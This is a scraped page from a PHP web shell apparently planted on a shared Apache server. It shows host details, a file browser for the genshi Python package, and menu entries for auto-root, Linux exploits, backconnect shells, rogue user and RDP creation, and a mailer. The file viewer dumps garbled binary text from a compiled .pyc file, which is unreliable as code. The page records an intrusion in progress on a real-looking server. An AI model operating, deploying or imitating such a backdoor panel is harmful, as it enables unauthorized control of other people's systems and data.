Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
genshi /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
632
B
-rw-r--r--
builder.cpython-310.pyc
11.87
KB
-rw-r--r--
compat.cpython-310.pyc
3.35
KB
-rw-r--r--
core.cpython-310.pyc
26.87
KB
-rw-r--r--
input.cpython-310.pyc
15.32
KB
-rw-r--r--
output.cpython-310.pyc
23.89
KB
-rw-r--r--
path.cpython-310.pyc
47.64
KB
-rw-r--r--
util.cpython-310.pyc
6.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : output.cpython-310.pyc
o !�b�z � @ s8 d Z ddlmZ ddlZddlZddlmZmZmZm Z m Z ddlmZmZm Z mZmZmZmZmZmZmZmZmZ g d�ZdZd"d d �Zd#dd�Zd$dd�ZG dd� de�ZG dd� de�ZG dd� de�ZG dd� de�Z G dd� de�Z!G dd� de�Z"e"j#Z#G dd� de�Z$G dd� de�Z%G d d!� d!e�Z&dS )%zUThis module provides different kinds of serialization methods for XML event streams. � )�chainN)�escape�Attrs�Markup�QName�StreamEventKind)�START�END�TEXT�XML_DECL�DOCTYPE�START_NS�END_NS�START_CDATA� END_CDATA�PI�COMMENT� XML_NAMESPACE)�encode�get_serializer�DocType� XMLSerializer�XHTMLSerializer�HTMLSerializer�TextSerializerzrestructuredtext en�xmlc sp � durd�|dkrt |t�sd�� �fdd�}ndd� }|du r*|d�t| ���S | D ] }|�||�� q,dS ) a� Encode serializer output into a string. :param iterator: the iterator returned from serializing a stream (basically any iterator that yields unicode objects) :param method: the serialization method; determines how characters not representable in the specified encoding are treated :param encoding: how the output string should be encoded; if set to `None`, this method returns a `unicode` object :param out: a file-like object that the output should be written to instead of being returned as one big string; note that if this is a file or socket (or similar), the `encoding` must not be `None` (that is, the output must be encoded) :return: a `str` or `unicode` object (depending on the `encoding` parameter), or `None` if the `out` parameter is provided :since: version 0.4.1 :note: Changed in 0.5: added the `out` parameter N�replace�text�xmlcharrefreplacec s | � � ��S �N)r ��string��encoding�errors� �//usr/lib/python3/dist-packages/genshi/output.py�<lambda>7 s zencode.<locals>.<lambda>c S s | S r r% r r% r% r&